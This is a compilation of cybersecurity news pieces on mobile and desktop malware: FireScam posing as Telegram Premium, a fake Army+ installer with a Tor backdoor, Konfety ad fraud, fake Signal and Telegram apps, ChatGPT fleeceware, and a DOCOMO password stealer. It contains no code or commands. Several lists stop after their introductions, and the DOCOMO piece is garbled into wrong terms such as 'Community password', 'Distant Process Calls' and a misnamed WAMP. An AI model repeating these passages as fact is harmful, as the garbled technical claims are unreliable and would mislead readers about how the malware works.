A newly discovered Android malware, FireScam, is being distributed through phishing websites on GitHub, masquerading as a premium version of the Telegram application. These malicious sites impersonate RuStore, a Russian app marketplace, to deceive users into downloading the infected software.
RuStore, launched by Russian tech giant VK (VKontakte) in May 2022, was developed as an alternative to Apple's App Store and Google Play following Western sanctions that restricted Russian users' access to global platforms. This marketplace hosts apps that comply with Russian regulations and operates under the oversight of the Russian Ministry of Digital Development.
According to security researchers at CYFIRMA, attackers have set up a fraudulent GitHub page mimicking RuStore. This fake website delivers a dropper module named GetAppsRu.apk. Once installed, the dropper requests extensive permissions, allowing it to scan installed applications, access device storage, and install additional software. It then downloads and executes the main malware payload, disguised as Telegram Premium.apk. This secondary payload enables the malware to monitor notifications, read clipboard data, access SMS and call information, and collect other sensitive details.
Once activated, FireScam presents users with a deceptive WebView-based Telegram login page designed to steal credentials. The malware communicates with Firebase Realtime Database, allowing stolen data to be uploaded instantly. It also assigns unique identifiers to compromised devices, enabling hackers to track them.
Stolen data is temporarily stored before being filtered and transferred to another location, ensuring that traces are erased from Firebase. Additionally, FireScam establishes a persistent WebSocket connection with the Firebase command-and-control (C2) server, enabling real-time command execution. This allows attackers to:
Furthermore, the malware can:
While the identity of FireScam’s operators remains unknown, CYFIRMA researchers warn that the malware exhibits advanced evasion techniques and poses a serious threat to users. To minimize the risk of infection, users should:
As attackers continue refining their tactics, staying vigilant against phishing campaigns and suspicious downloads is essential to protecting personal and financial data.
Cybersecurity experts said that a malware campaign targeting Ukraine's military personnel has been released. The malware is spread with the help of a fake installer for an app called "Army+." That installer looks perfectly legitimate but embeds malicious code. It will install the Tor browser and use the hidden PowerShell script to carry on malicious activities; this means that there is misuse of the Tor browser for secretive purposes rather than any other purpose that it was used for.
How the Malware Works
The installation process starts with the fake app ArmyPlusInstaller. It launches a decoy application, ArmyPlus.exe, to avoid suspicion. In the background, a hidden script, init.ps1, works to bypass security restrictions on the system.
It would normally block such unauthorized scripts to keep a computer safe. But the malware will play with security settings by means of specific PowerShell commands to have the liberty of working freely. It even reduces the size of the console window to conceal all its actions and create further illusion. It plants files in strategic locations
The malware spreads its files throughout the folders of the system to remain hidden. For instance, the Tor browser files are stored in a directory called OneDriveData, while OpenSSH files, which give the attackers remote access, are kept in a folder called ssh.
This init.ps1 script plays a crucial role as it can pull down and install the Tor browser for use in secret operations. The init.ps1 script establishes communication between the compromised computer and the attacker, giving them an avenue through which to command the system from a stealth position.
Backdoor That Survives Reboot
After installation, it establishes a backdoor through which attackers secretly command the system remotely. The system information is then transmitted along with a public RSA key through Tor to a remote server. The latter facilitates communication from the attackers side encrypted through that public RSA key. In that manner, an attacker is in a position to issue commands, and if they have their ways, may end up commanding at a very high level within the system.
Exploiting User Trust
A devious malware installer masquerading as a program installation. Requesting administrative credentials, which may be granted unwarily by innocent users. Once the visible, front-end app fails, all the malicious instructions are executed on the backhand in silence silently, including accessing and transmitting some sensitive information it has gathered.
Why Is This Important
This incident highlights how cybercriminals exploit everyday tools, like PowerShell and Tor, to hide their attacks. In this way, they mimic legitimate software, making it harder for standard defenses to detect them.
It is a reminder for all of us to download software only from trusted sources and for organizations to regularly update their security measures. Being alert will help prevent such stealthy cyberattacks from succeeding.
This development underlines the increasing nuances in cyber threats in conflict zones as attackers continue to evolve their techniques to evade detection.
In a major development, the HUMAN Satori Threat Intelligence and Research Team has successfully dismantled a vast mobile advertising fraud operation known as "Konfety." This scheme, which generated billions of fake ad requests each day, was designed to deceive both users and advertisers on a large scale.
The Konfety scammers used a mobile advertising tool called CaramelAds to carry out their scheme. They created numerous fake apps, which appeared to be ordinary games on the Google Play Store. These apps were actually just a front for the fraud. The core of the scam involved "evil twin" apps—modified versions of CaramelAds that did not follow privacy regulations and were used to show fraudulent ads.
The fraudulent apps were designed to mimic genuine user activity. They displayed unwanted ads, opened websites without user consent, and used various tactics to create the illusion of legitimate traffic. This allowed the scammers to profit from fake ad views and clicks, deceiving both users and advertisers.
Upon discovering the fraud, the HUMAN team quickly implemented measures to block the fraudulent traffic. They flagged suspicious activity and worked with ad networks to stop the scam. In response, the fraudsters tried to shift their operations to other networks not protected by HUMAN, but their efforts were largely thwarted by HUMAN’s protective measures.
Google Play Protect was crucial in identifying and removing the fraudulent apps. Despite its efforts, the scale of the Konfety scheme highlighted the ongoing challenge of preventing such sophisticated scams. Google continues to monitor and protect users from these threats.
HUMAN’s team developed specific detection techniques for the Konfety scam and shared their findings with other security experts. This collaboration led to a significant reduction in fraudulent ad requests and enhanced overall security in digital advertising.
The successful shutdown of the Konfety fraud needs a heedful of vigilance and cooperation in the fight against online scams. HUMAN’s ongoing efforts to safeguard the integrity of digital advertising are essential as cybercriminals continue to evolve their tactics. This case highlights the need for constant vigilance and industry collaboration to maintain a secure online environment.
However, with the rise in popularity of these apps, there has also been an increase in the number of fake apps that pose as extensions or premium versions of these popular messaging platforms.
In this blog post, we will discuss the recent discovery of fake Signal and Telegram apps that have been found to sneak malware into thousands of Android phones.
Researchers at the cybersecurity firm ESET recently discovered fake apps in the Google and Samsung app stores that posed as extensions or premium versions of the popular messaging platforms Signal and Telegram.
These malicious apps, called Signal Plus Messenger and FlyGram, were designed to steal user data. When users took certain actions, these fake apps could pull sensitive information from legitimate Signal and Telegram accounts, including call logs, SMS messages, locations and more.
By stealing sensitive information from legitimate Signal and Telegram accounts, these malicious apps can compromise the privacy and security of users’ conversations.
This can lead to identity theft, financial fraud, and other forms of cybercrime. It is therefore important for users to be vigilant when downloading apps from app stores and to only download apps from trusted sources.
Cybersecurity firm Sophos has now made the users acknowledge the case of fake ChatGPT apps. It claims that downloading these apps can be risky, that they have almost no functionality, and that they are continually sending advertisements. According to the report, these apps lure unaware users into subscribing for a subscription that can costs hundreds of dollars annually.
Sophos refers these fake ChatGPT apps as fleeceware, describing them as ones that bombard users with adverts until they give in and purchase the subscription. These apps are purposefully made to only be used for a short period of time after the free trial period ends, causing users to remove them without realizing they are still obligated to make weekly or monthly membership payments.
According to the report, five investigated bogus ChatGPT apps with names like "Chat GBT" were available in order to deceive users and increase their exposure in the Google Play or App Store rankings. The research also claimed that whereas these fake apps charged users ranging from $10 per month to $70 per year, OpenAl's ChatGPT offers key functionality that could be used for free online. Another scam app named Genie lured users into subscribing for $7 weekly or $70 annually, generating $1 million in income over the previous month.
“Scammers have and always will use the latest trends or technology to line their pockets. ChatGPT is no exception," said Sean Gallagher, principal threat researcher, Sophos. "With interest in AI and chatbots arguably at an all-time high, users are turning to the Apple App and Google Play Stores to download anything that resembles ChatGPT. These types of scam apps—what Sophos has dubbed ‘fleeceware’—often bombard users with ads until they sign up for a subscription. They’re banking on the fact that users won’t pay attention to the cost or simply forget that they have this subscription. They’re specifically designed so that they may not get much use after the free trial ends, so users delete the app without realizing they’re still on the hook for a monthly or weekly payment."
While some of the bogus ChatGPT fleeceware have already been tracked and removed from the app stores, they are expected to resurface in the future. Hence, it is recommended for users to stay cautious of these fake apps, and make sure that the apps they are downloading are legitimate.
For users who have already download these apps are advised to follow protocols provided by the App Store or Google Play store on how to “unsubscribe,” since just deleting the bogus apps would not cancel one’s subscription.
A new malware has been observed by the Research team at McAfee Corp. This malware is found to be attacking NTT DOCOMO customers in Japan.
The malware that is distributed via the Google Play Store pretends to be a legitimate mobile security app, but in reality, it is a fraud malware designed to steal passwords and abuse reverse proxy focusing on NTT DOCOMO mobile service customers.
The McAfee Cell Analysis team informed Google regarding the notoriety of the malware. In response, Google has made the application unavailable in Google Play Store and removed known Google Drive files that are associated with the malware. In addition to this, Google Play Shield has now alerted the customers by disabling the apps and displaying a warning.
The malware publishes malicious fake apps on Google Play Store with various developer accounts that appear like some legitimate apps. According to a tweet by Yusuke Osumi, a Security Researcher at Yahoo, the attacker lures the victims into installing the malware in their systems by sending them an SMS message with a Google Play Store link, reportedly sent from overseas. Additionally, they entice the users by displaying a requirement to update their security software.
This way, the victim ignorantly installs the fraudulent app from Google Play Store and ends up installing the malware. The malware asks the user for a community password but cleverly enough, it claims the password is incorrect, so the user has to enter a more precise password. It does not matter if the password is incorrect or not, as this community password can later be used by the attacker for the NTT DOCOMO fee services and gives way to online funds.
Thereafter, the malware displays a fake ‘Mobile Security’ structure on the user’s screen; the structure of this Mobile Security structure interestingly resembles that of an outdated display of McAfee cell security.
How does the malware function
A native library called ‘libmyapp.so’ written in Golang, is loaded through the app execution. When the library is loaded, it attempts to connect with C&C servers utilizing an Internet Socket. WAMP (Internet Software Messaging Protocol) is then employed to speak and initiate Distant Process Calls (DPC). When the link is formulated, the malware transmits the community data and the victim’s phone number, registering the client’s procedural commands. The connection is then processed when the command is received from the server like an Agent. Wherein, the socket is used to transmit the victim’s Community password to the attacker, when the victim enters his network password in the process.
The attacker makes fraudulent purchases using this leaked information. For this, the RPC command ‘toggle_wifi’ switch the victim’s Wi-Fi connection status, and a reverse proxy is provided to the attacker through ‘connect_to’. This would allow connecting the host behind a Community Handle Translation (NAT) or firewall. With the help of a proxy, now the attacker can ship by request through the victim’s community network.
Along with any other methods that the attackers may use, the malware can also use reverse proxy to acquire a user’s mobile and network information and implement an Agent service with WAMP for fraudulent motives. Thus, it is always advised by Mobile Security Organizations to be careful while entering a password or confidential information into a lesser-known or suspicious application.